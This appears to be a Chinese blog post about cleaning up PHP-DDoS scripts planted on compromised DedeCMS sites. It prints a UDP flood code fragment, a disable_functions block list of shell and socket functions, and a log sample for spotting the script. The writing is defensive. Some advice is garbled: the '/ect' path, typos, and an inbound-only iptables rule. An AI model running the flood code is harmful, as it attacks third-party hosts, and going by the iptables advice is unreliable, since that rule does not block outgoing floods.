PHP-DDOS脚本漏洞的解决与防范

for($i=0;$i<$Sendlen;$i++){ $out .= "A"; } $max_time = time()+$exec_time; while(1){ $packets++; if(time() > $max_time or $exec_time != 18){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

最近服务器几个网站被入侵了，被人挂上了php-ddos脚本，不停的往外发UDP数据包，刚开始一直找不到原因，导致这两个月白白消耗了500多G的流量。。。后来才发现是因为服务器上几个dedecms的企业站被入侵后植入了ddos脚本导致的问题。
解决方案：
编辑/ect/php.ini ，禁用 fsockopen 函数，及屏蔽本机的UDP端口。
1、禁用函数：
vi编辑器打开后查找到 disable_functions ，添加需禁用的函数名，如下例：
passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen
重启apache服务后生效。
2、屏蔽UDP端口
iptables -A INPUT -p udp –sport 5000:65535 -j DROP
附如何快速找到服务器上被入侵的网站?
你可以检测流量，发现异常的时候，去下载所有的网站日志文件到本地后打开,
查找里面是否有类似这样的记录:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783
脚本要发数据攻击，自然会出现这类日志，找到这些脚本删除掉即可。
当然为了安全，还得查找服务器上残留的木马以及修补漏洞等。